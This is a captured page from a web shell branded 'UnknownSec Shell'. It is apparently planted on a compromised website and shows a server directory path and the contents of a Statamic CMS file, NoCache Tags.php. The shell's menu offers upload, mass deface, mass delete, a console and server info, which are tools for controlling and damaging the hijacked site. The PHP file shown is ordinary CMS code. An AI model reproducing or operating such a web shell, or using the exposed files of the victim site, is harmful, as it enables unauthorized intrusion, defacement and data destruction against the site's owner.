shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
StaticCaching
/
NoCache
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Tags.php
<?php namespace Statamic\StaticCaching\NoCache; use Statamic\Facades\Antlers; class Tags extends \Statamic\Tags\Tags { public static $handle = 'nocache'; public static $stack = 0; /** * @var Session */ private $nocache; public function __construct(Session $nocache) { $this->nocache = $nocache; } public function index() { if ($this->params->has('select')) { $fields = $this->params->explode('select'); if (in_array('@auto', $fields)) { $identifiers = Antlers::identifiers($this->content); $fields = array_merge(array_diff($fields, ['@auto']), $identifiers); } } return $this ->nocache ->pushRegion($this->content, $this->context->only($fields ?? null)->all(), 'antlers.html') ->placeholder(); } }
© 2026 UnknownSec